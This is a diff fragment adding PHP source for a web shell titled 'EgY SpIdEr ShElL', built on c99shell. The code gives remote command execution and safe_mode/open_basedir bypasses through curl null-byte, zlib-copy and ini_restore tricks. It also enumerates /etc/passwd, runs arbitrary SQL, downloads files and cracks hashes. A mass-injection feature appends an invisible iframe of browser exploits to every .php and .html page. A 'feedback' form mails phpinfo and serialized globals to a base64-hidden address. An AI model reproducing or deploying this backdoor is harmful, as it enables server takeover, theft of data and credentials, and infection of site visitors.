+     return 0;
+  break;
+    }
+   return 1; 
+  }
+ function close()
+  { 
+   switch($this->db)
+    {
+  case 'MySQL': 
+     @mysql_close($this->connection); 
+  break;
+  case 'MSSQL':
+     @mssql_close($this->connection);
+  break;
+  case 'PostgreSQL':
+     @pg_close($this->connection);
+  break;
+  case 'Oracle':
+     @oci_close($this->connection);
+  break;
+  case 'MySQLi':
+     @mysqli_close($this->connection); 
+  break;
+  case 'mSQL':
+     @msql_close($this->connection); 
+  break;
+  case 'SQLite':
+     @sqlite_close($this->connection); 
+  break;
+    }
+  }
+ function affected_rows()
+  { 
+   switch($this->db)
+    {
+  case 'MySQL':
+   return @mysql_affected_rows($this->res); 
+  break;
+  case 'MSSQL':
+     return @mssql_affected_rows($this->res);
+  break;
+  case 'PostgreSQL':
+     return @pg_affected_rows($this->res);
+  break;
+  case 'Oracle':
+     return @ocirowcount($this->res);
+  break;
+  case 'MySQLi':
+     return @mysqli_affected_rows($this->res); 
+  break;
+  case 'mSQL':
+     return @msql_affected_rows($this->res); 
+  break;
+  case 'SQLite':
+     return @sqlite_changes($this->res);
+  break;
+  default:
+     return 0;
+  break;
+  	   break;
+case 'cURL':
+   if(empty($_POST['egy_spider'])){
+
+
+
+
+} else {
+$curl=$_POST['egy_spider'];
+$ch =curl_init("file:///".$curl."\x00/../../../../../../../../../../../../".__FILE__);
+curl_exec($ch);
+var_dump(curl_exec($ch));
+echo "</textarea></CENTER>";
+
+
+}
+break;
+case 'copy':
+
+
+if(empty($snn)){
+if(empty($_GET['snn'])){
+if(empty($_POST['snn'])){
+
+
+} else {
+$u1p=$_POST['snn'];
+}
+} else {
+$u1p=$_GET['snn'];
+}
+}
+  $u1p=""; // File to Include... or use _GET _POST
+$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
+
+
+
+
+$temp=tempnam($tymczas, "cx");
+
+
+if(copy("compress.zlib://".$snn, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "".htmlspecialchars($tekst)."";
+unlink($temp);
+echo "</textarea></CENTER>";
+}
+break;
+case 'ini_restore':
+ if(empty($_POST['ini_restore'])){
+} else {
+
+
+$ini=$_POST['ini_restore'];
+echo ini_get("safe_mode");
+echo ini_get("open_basedir");
+require_once("$ini");
+ini_restore("safe_mode");
+ini_restore("open_basedir");
+echo ini_get("safe_mode");
+echo ini_get("open_basedir");
+include($_GET["egy"]);
+echo "</textarea></CENTER>";
+}
+break;
+case 'glob':
+function reg_glob()
+{
+$chemin=$_REQUEST['glob'];
+$files = glob("$chemin*");
+
+
+
+
+foreach ($files as $filename) {
+
+
+   echo "$filename\n";
+
+
+}
+}
+
+
+if(isset($_REQUEST['glob']))
+{
+reg_glob();
+}
+
+
+break;
+  case 'sym1':
+     if(empty($_POST['sym1p'])){
+             } else {
+$symp=$_POST['sym1p'];
+         }
+     if(empty($_POST['sym1p2'])){
+
+
+} else {
+$symp2=$_POST['sym1p2'];
+
+
+  symlink("a/a/a/a/a/a/", "dummy");
+symlink("dummy".$symp2."".$symp."", "xxx");
+unlink("dummy");
+while (1) {
+symlink(".", "dummy");
+
+
+  }
+ }
+  break;
+  case 'sym2':
+  @include(xxx);
+
+
+  break;
+  case 'plugin':
+  if ($_POST['plugin'] ){
+
+
+
+
+                                           for($uid=0;$uid<60000;$uid++){   //cat /etc/passwd
+                                        $ara = posix_getpwuid($uid);
+                                                if (!empty($ara)) {
+                                                  while (list ($key, $val) = each($ara)){
+                                                    print "$val:";
+                                                  }
+                                                  print "\n";
+                                                }
+                                        }
+                                 echo "</textarea>";
+								              }
+
+
+    }
+  }
+ } 
+if(isset($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
+ {
+  if($file=moreread($_POST['d_name'])){ $filedump = $file; }
+  else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; }
+  if(!empty($_POST['cmd'])) 
+   {
+    @ob_clean();
+    $filename = @basename($_POST['d_name']);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
+    header("Content-type: ".$mime_type);
+    header("Content-disposition: attachment; filename=\"".$filename."\";");   
+    echo $filedump;
+    exit();
+   }
+ }
+if(isset($_GET['1'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); }
+if (isset($_POST['cmd']) && $_POST['cmd']=="db_query")
+ {
+ echo $head;
+ $sql = new my_sql();
+ $sql->db   = $_POST['db'];
+ $sql->host = $_POST['db_server'];
+ $sql->port = $_POST['db_port'];
+ $sql->user = $_POST['mysql_l'];
+ $sql->pass = $_POST['mysql_p'];
+ $sql->base = $_POST['mysql_db'];
+ $querys = @explode(';',$_POST['db_query']);
+ echo '<body bgcolor=#e4e0d8>';
+ if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
+  else 
+   {
+   if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
+   else
+    {
+    foreach($querys as $num=>$query) 
+     {
+      if(strlen($query)>5)
+      {
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
+      switch($sql->query($query))
+       {
+       case '0':
+       echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
+       break;
+       case '1': 
+       if($sql->get_result())
+        {
+       echo "<table width=100%>";
+        foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
+       $keys = @implode("&nbsp;</b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;", $sql->columns);
+        echo "<tr><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+        for($i=0;$i<$sql->num_rows;$i++)
+         {
+         foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
+         $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]);
+         echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
+         }
+        echo "</table>"; 
+        }
+       break;
+       case '2':
+       $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); 
+       echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
+       break; 
+       }
+      }
+     }
+    }
+   }   
+ echo "<br><form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_server',0,$_POST['db_server']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center>";
+ echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
+ echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; 
+ echo "</form>";
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die();
+ }
+if(isset($_GET['12']))
+ {
+   @unlink(__FILE__);
+ }
+if(isset($_GET['11']))
+ {
+   @unlink($tempdir.'bdpl');
+   @unlink($tempdir.'back');
+   @unlink($tempdir.'bd');
+   @unlink($tempdir.'bd.c');
+   @unlink($tempdir.'dp');
+   @unlink($tempdir.'dpc');
+   @unlink($tempdir.'dpc.c');
+   @unlink($tempdir.'prxpl');
+   @unlink($tempdir.'grep.txt');
+ }
+if(isset($_GET['2']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['3']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['4']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
+   die();
+ }
+ 
+ 
+ 
+ 
+ if(isset($_GET['tool'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); }
+ if(isset($_GET['tools'])) { /*########################################### 
+code 2                						  
+###########################################*/
+?>
+<html> 
+<head><title>EgY SpIdEr ShElL</title></head>
+<STYLE>
+
+
+BODY
+ {
+        SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #666666; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
+}
+
+
+table {
+BORDER:  #eeeeee  outset;
+BACKGROUND-COLOR: #000000;
+color: #dadada;
+}
+input {
+BORDER-RIGHT:  #00FF00 1 solid;
+BORDER-TOP:    #00FF00 1 solid;
+BORDER-LEFT:  #00FF00 1 solid;
+BORDER-BOTTOM: #00FF00 1 solid;
+BACKGROUND-COLOR: #333333;
+font: 9pt tahoma;
+color: #ffffff;
+}
+
+
+submit {
+BORDER:  buttonhighlight 1 outset;
+BACKGROUND-COLOR: #272727;
+width: 40%;
+color: #dadada;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1 solid;
+BORDER-TOP:    #999999 1 solid;
+BORDER-LEFT:   #999999 1 solid;
+BORDER-BOTTOM: #ffffff 1 solid;
+BACKGROUND-COLOR: #333333;
+font: Fixedsys bold;
+color: #ffffff;
+}
+BODY {
+margin: 1;
+color: #dadada;
+background-color: #000000;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+
+
+</STYLE>
+</body> 
+</html> 
+<?
+$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
+$sf="<form method=post>";$ef="</form>";
+$st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
+$et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
+$c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
+$sta="<textarea cols=157 rows=23>";$eta="</textarea>";
+$sfnt="<font face=tahoma size=2 color=#008080>";$efnt="</font>";
+error_reporting(0); 
+set_magic_quotes_runtime(0);
+
+
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {$_POST   = &$HTTP_POST_VARS;$_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ }function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
+if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}
+elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;}
+else{return $requ."?".$link."=".$val;}}
+function delm($delmtxt){print"<center><table bgcolor=black style='border:1px solid olive' width=99% height=2%>";print"<tr><td><b><center><font size=2 color=olive>$delmtxt</td></tr></table></center>";}
+function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);
+$nscmd=htmlspecialchars($scmd);print $nscmd;}
+elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);
+$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}
+elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");
+while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;
+print $res;}pclose($pcmd);}elseif(!function_exists(popen)){ 
+ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){
+ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean();
+print htmlspecialchars($pret);}}
+function input($type,$name,$value,$size)
+{if (empty($value)){print "<input type=$type name=$name size=$size>";}
+elseif(empty($name)&&empty($size)){print "<input type=$type value=$value >";}
+elseif(empty($size)){print "<input type=$type name=$name value=$value >";}
+else {print "<input type=$type name=$name value=$value size=$size >";}}
+function permcol($path){if (is_writable($path)){print "<font color=olive>";
+callperms($path); print "</font>";}
+elseif (!is_readable($path)&&!is_writable($path)){print "<font color=red>";
+callperms($path); print "</font>";}
+else {print "<font color=white>";callperms($path);}}
+if ($dlink=="dwld"){download($_REQUEST['dwld']);}
+function download($dwfile) {$size = filesize($dwfile);
+@header("Content-Type: application/force-download;name=$dwfile");
+@header("Content-Transfer-Encoding: binary");
+@header("Content-Length: $size");
+@header("Content-Disposition: attachment; filename=$dwfile");
+@header("Expires: 0");
+@header("Cache-Control: no-cache, must-revalidate");
+@header("Pragma: no-cache");
+@readfile($dwfile); exit;}
+?>
+<?
+$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
+
+
+$sf="<form method=post>";$ef="</form>";
+$st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
+$et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
+$c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
+$sta="<textarea cols=157 rows=23>";$eta="</textarea>";
+$sfnt="<font face=tahoma size=2 color=olive>";$efnt="</font>";
+################# Ending of common variables ########################
+
+
+print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<b><center><font face=tahoma color=white size=4>
+</font></b></center>"; print"</td></tr>";print"</table>";print "<br>";
+print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<center><div><b>";print "";
+
+
+if ($act == 'encoder')
+{
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>"; 
+ foreach(array("md5","crypt","sha1","crc32") as $v) 
+ { 
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; 
+ } 
+ echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> 
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> 
+ <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>"; 
+ echo "<center>base64_decode - "; 
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} 
+ else 
+ { 
+  $debase64 = base64_decode($encoder_input); 
+  $debase64 = str_replace("\0","[0]",$debase64); 
+  $a = explode("\r\n",$debase64); 
+  $rows = count($a); 
+  $debase64 = htmlspecialchars($debase64); 
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} 
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";} 
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>"; 
+ } 
+ echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; 
+ $c = strlen($encoder_input); 
+ for($i=0;$i<$c;$i++) 
+ { 
+  $hex = dechex(ord($encoder_input[$i])); 
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} 
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} 
+ } 
+ echo "\" readonly><br></form>"; 
+
+
+?>
+</center>
+<br><br>
+<table border=0 align=center cellpadding=4>
+<tr><td>
+<center><b>Search milw0rm for MD5 hash</b></center>
+</td><td>
+<center><b>Search md5encryption.com for MD5 or SHA1 hash</b></center>
+</td><td>
+<center><b>Search CsTeam for MD5 hash</b></center>
+</td></tr>
+<tr><td>
+<center>
+<form target="_blank" action="http://www.milw0rm.com/cracker/search.php" method=POST>
+<input type=text size=40 name=hash> <input type=submit value="Submit"></form>
+</center>
+</td><td>
+<center>
+<form target="_blank" action="http://www.md5encryption.com/?mod=decrypt" method=POST>
+<input type=text size=40 name=hash2word> <input type=submit value="Submit"></form>
+</center>
+</td><td>
+<center>
+<form target="_blank" action="http://www.csthis.com/md5/index.php" method=POST>
+<input type=text size=40 name=h> <input type=submit value="Submit"></form>
+</center>
+</td></tr>
+</table>
+<br>
+<center>
+<?php
+// my wordlist cracker ^_^
+if (isset($_GET['hash']) && isset($_GET['wordlist']) && ($_GET['type'] == 'md5' || $_GET['type'] == 'sha1')) {
+	$type = $_GET['type'];
+	$hash = $_GET['hash'];
+	$count = 1;
+	$wordlist = file($_GET['wordlist']);
+	$words = count($wordlist);
+	foreach ($wordlist as $word) {
+		echo $count.' of '.$words.': '.$word.'<br>';
+		if ($hash == $type(rtrim($word))) {
+			echo '<font color=red>Great success!  The password is: '.$word.'</font><br>';
+			exit;
+		}
+		++$count;
+	}
+}
+
+
+} 
+if ($act == 'fsbuff') 
+{ 
+ $arr_copy = $sess_data["copy"]; 
+ $arr_cut = $sess_data["cut"]; 
+ $arr = array_merge($arr_copy,$arr_cut); 
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} 
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} 
+} 
+if ($act == "selfremove") 
+{ 
+ if (($submit == $rndcode) and ($submit != "")) 
+ { 
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } 
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} 
+ } 
+ else 
+ { 
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} 
+  $rnd = rand(0,9).rand(0,9).rand(0,9); 
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>"; 
+ } 
+} 
+if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}} 
+if ($act == "feedback") 
+{ 
+ $suppmail = base64_decode("ZWd5X3NwaWRlckBob3RtYWlsLmNvbQ=="); 
+ if (!empty($submit)) 
+ { 
+  $ticket = substr(md5(microtime()+rand(1,1000)),0,6); 
+  $body = "egy_spider v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\nE-server: ".htmlspecialchars($_SERVER['REQUEST_URI'])."\nE-server2: ".htmlspecialchars($_SERVER["SERVER_NAME"])."\n\nIP: ".$REMOTE_ADDR; 
+  if (!empty($fdbk_ref)) 
+  { 
+   $tmp = @ob_get_contents(); 
+   ob_clean(); 
+   phpinfo(); 
+   $phpinfo = base64_encode(ob_get_contents()); 
+   ob_clean(); 
+   echo $tmp; 
+   $body .= "\ni"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; 
+  } 
+  mail($suppmail,"egy_spider v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); 
+  echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>"; 
+ } 
+ else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>If you want to send a request for any help I know I will respond to you in case <br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: Arbic, English.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";} 
+} 
+
+
+if ($act == 'massbrowsersploit') {
+?>
+<b>Mass Code Injection:</b><br><br>
+Use this to add HTML to the end of every .php, .htm, and .html page in the directory specified.<br><br>
+<form action="<?php echo $surl; ?>" method=GET>
+<input type=hidden name="masssploit" value="goahead">
+<input type=hidden name="act" value="massbrowsersploit">
+<table border=0>
+<tr><td>Dir to inject: </td><td><input type=text size=50 name="pathtomass" value="<?php echo realpath('.'); ?>"> <-- default is dir this shell is in</td></tr>
+<tr><td>Code to inject: </td><td><textarea name="injectthis" cols=50 rows=4><?php echo htmlspecialchars('<IFRAME src="http://www.egyspider.eu" width=0 height=0 frameborder=0></IFRAME>'); ?></textarea> <-- best bet would be to include an invisible iframe of browser exploits</td></tr>
+<tr><td><input type=submit value="Inject Code"></td></tr>
+</table>
+</form>
+<?php
+if ($_GET['masssploit'] == 'goahead') {
+	if (is_dir($_GET['pathtomass'])) {
+		$lolinject = $_GET['injectthis'];
+		foreach (glob($_GET['pathtomass']."/*.php") as $injectj00) {
+			$fp=fopen($injectj00,"a+");
+			if (fputs($fp,$lolinject)){
+				echo $injectj00.' was injected<br>';
+			} else {
+				echo '<font color=red>failed to inject '.$injectj00.'</font>';
+			}
+		}
+		foreach (glob($_GET['pathtomass']."/*.htm") as $injectj00) {
+			$fp=fopen($injectj00,"a+");
+			if (fputs($fp,$lolinject)){
+				echo $injectj00.' was injected<br>';
+			} else {
+				echo '<font color=red>failed to inject '.$injectj00.'</font>';
+			}
+		}
+		foreach (glob($_GET['pathtomass']."/*.html") as $injectj00) {
+			$fp=fopen($injectj00,"a+");
+			if (fputs($fp,$lolinject)){
+				echo $injectj00.' was injected<br>';
+			} else {
+				echo '<font color=red>failed to inject '.$injectj00.'</font>';
+			}
+		}
+	} else { //end if inputted dir is real -- if not, show an ugly red error
+		echo '<b><font color=red>'.$_GET['pathtomass'].' is not available!</font></b>';
+	} // end if inputted dir is real, for real this time
+} // end if confirmation to mass sploit is go
+} // end if massbrowsersploit is called
+
+
+
+
+
+
+if ($dlink=='showsrc'){
+print "<p><b>: Choose a php file to view in a color mode, any extension else will appears as usual :";print "<form method=get>";
+input ("text","tools&dlink=showsrc","",35);print " ";
+input ("hidden","scdir",$scdir,22);input ("submit","tools&dlink=showsrc","Show-src","");print $ef; die();}if(isset($_REQUEST['tools&dlink=showsrc'])){callshsrc(trim($_REQUEST['showsc']));}
+if (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt']))
+{if (touch ($_REQUEST['indx'])==true){
+$fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt']));
+fclose($fp);print "<p>[ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]</p>";print "<b><center>[ <a href='javascript:history.back()'>Edit again</a>
+] -- [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</center></b>";die(); }else {print "<p>[ Sorry, Can't create the index !! ]</p>";die();}}
+if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){
+print $sf."<br>";print "<p><textarea cols=50 rows=10 name=indxtxt>
+Your index contents here</textarea></p>";
+input ("text","indx","Index-name",35);print " ";
+input ("submit","qindsub","Create","");print $ef;die();}
+if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){
+$mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt'];
+if (mail($mailto,$subj,$mailtxt)){print "<p>[ Mail sended to $sfnt".$mailto." $efnt successfully ]</p>"; die();}else {print "<p>[ Error, Can't send the mail ]</p>";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "<p>[ Error, Can't send the mail ]</p>";die();}
+if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){
+print $sf."<br>";print "<p><textarea cols=50 rows=10 name=mailtxt>
+Your message here</textarea></p>";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " ";
+input ("submit","mailsub","Send-mail","");print $ef;die();}
+if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);}
+function callzone($nscdir){
+if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";}
+else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";}
+fwrite ($fpz,"\$arq = @ARGV[0];
+\$grupo = @ARGV[1];
+chomp \$grupo;
+open(a,\"<\$arq\");
